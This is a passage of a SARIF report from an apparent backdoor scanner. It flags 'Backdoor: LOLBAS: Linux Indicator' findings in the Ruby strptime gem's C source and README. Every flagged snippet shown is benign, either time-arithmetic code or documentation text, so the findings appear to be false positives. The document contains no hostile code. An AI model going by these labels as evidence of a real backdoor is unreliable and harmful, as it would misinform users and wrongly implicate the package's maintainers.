                      "markdown": "`    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 606,
                  "startColumn": 10,
                  "endLine": 606,
                  "endColumn": 16,
                  "snippet": {
                    "text": "    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n",
                    "rendered": {
                      "text": "    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n",
                      "markdown": "`    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 606,
                  "startColumn": 3,
                  "endLine": 606,
                  "endColumn": 9,
                  "snippet": {
                    "text": "    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n",
                    "rendered": {
                      "text": "    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n",
                      "markdown": "`    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 605,
                  "startColumn": 10,
                  "endLine": 605,
                  "endColumn": 16,
                  "snippet": {
                    "text": "    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n",
                    "rendered": {
                      "text": "    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n",
                      "markdown": "`    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 604,
                  "startColumn": 10,
                  "endLine": 604,
                  "endColumn": 16,
                  "snippet": {
                    "text": "\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n",
                    "rendered": {
                      "text": "\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n",
                      "markdown": "`\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 604,
                  "startColumn": 3,
                  "endLine": 604,
                  "endColumn": 9,
                  "snippet": {
                    "text": "\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n",
                    "rendered": {
                      "text": "\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n",
                      "markdown": "`\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 603,
                  "startColumn": 10,
                  "endLine": 603,
                  "endColumn": 16,
                  "snippet": {
                    "text": "    else {\n\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n",
                    "rendered": {
                      "text": "    else {\n\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n",
                      "markdown": "`    else {\n\tsign = 1;\n    }\n    tsec = diff % 60;\n    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 598,
                  "endLine": 598,
                  "endColumn": 6,
                  "snippet": {
                    "text": "\n    if (diff < 0) {\n\tsign = -1;\n\tdiff = -diff;\n    }\n    else {\n\tsign = 1;\n",
                    "rendered": {
                      "text": "\n    if (diff < 0) {\n\tsign = -1;\n\tdiff = -diff;\n    }\n    else {\n\tsign = 1;\n",
                      "markdown": "`\n    if (diff < 0) {\n\tsign = -1;\n\tdiff = -diff;\n    }\n    else {\n\tsign = 1;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/README.md"
                },
                "region": {
                  "startLine": 38,
                  "startColumn": 16,
                  "endLine": 38,
                  "endColumn": 22,
                  "snippet": {
                    "text": "parser.execi('2015-12-25T12:34:56+09') #=> 1451014496\n```\n\n### Strftime for time formatting\n\n```ruby\nrequire 'strptime'\n",
                    "rendered": {
                      "text": "parser.execi('2015-12-25T12:34:56+09') #=> 1451014496\n```\n\n### Strftime for time formatting\n\n```ruby\nrequire 'strptime'\n",
                      "markdown": "`parser.execi('2015-12-25T12:34:56+09') #=> 1451014496\n```\n\n### Strftime for time formatting\n\n```ruby\nrequire 'strptime'\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/README.md"
                },
                "region": {
                  "startLine": 29,
                  "startColumn": 16,
                  "endLine": 29,
                  "endColumn": 22,
                  "snippet": {
                    "text": "\n## Usage\n\n### Strptime for time parsing\n\n```ruby\nrequire 'strptime'\n",
                    "rendered": {
                      "text": "\n## Usage\n\n### Strptime for time parsing\n\n```ruby\nrequire 'strptime'\n",
                      "markdown": "`\n## Usage\n\n### Strptime for time parsing\n\n```ruby\nrequire 'strptime'\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/README.md"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 138,
                  "endLine": 7,
                  "endColumn": 144,
                  "snippet": {
                    "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                    "rendered": {
                      "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                      "markdown": "`[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/README.md"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 104,
                  "endLine": 7,
                  "endColumn": 110,
                  "snippet": {
                    "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                    "rendered": {
                      "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                      "markdown": "`[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/README.md"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 50,
                  "endLine": 7,
                  "endColumn": 56,
                  "snippet": {
                    "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                    "rendered": {
                      "text": "[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n",
                      "markdown": "`[![Build status](https://ci.appveyor.com/api/projects/status/9wr116l8uy1bdcxf/branch/master?svg=true)](https://ci.appveyor.com/project/nurse/strptime/branch/master)\n\n\nWelcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/strptime`. To experiment with that code, run `bin/console` for an interactive prompt.\n\nTODO: Delete this and the text above, and describe your gem\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}